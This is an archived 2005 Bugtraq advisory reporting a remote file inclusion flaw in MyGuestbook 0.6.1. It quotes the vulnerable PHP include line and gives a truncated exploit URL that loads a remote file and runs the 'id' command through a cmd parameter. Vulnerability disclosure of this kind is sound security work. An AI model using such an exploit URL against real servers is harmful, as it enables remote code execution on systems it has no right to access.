Remote File Inclusion in MyGuestbook

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Remote File Inclusion in MyGuestbook
From: "rod hedor" <rodhedor@xxxxxxxxxxx>
Date: Wed, 14 Sep 2005 23:50:24 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Remote File Inclusion in MyGuestbook

Date: 10/07/2005

Severity: High

version: 0.6.1

The bug reside in form.inc.php3

The Vulnerable Code




if ($show < 1) {
include ("form.inc.php3");
}


Exploit :

http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id


Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

Best Regards

_________________________________________________________________

Express yourself instantly with MSN Messenger! Download today it's FREE!http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Follow-Ups:
- Re: Remote File Inclusion in MyGuestbook
  - From: security curmudgeon

Prev by Date: Is netcraft publishing URL of your intranet sites?
Next by Date: Re: [Full-disclosure] Mozilla / Mozilla Firefox authentication weakness
Previous by thread: Is netcraft publishing URL of your intranet sites?
Next by thread: Re: Remote File Inclusion in MyGuestbook
Index(es):
- Date
- Thread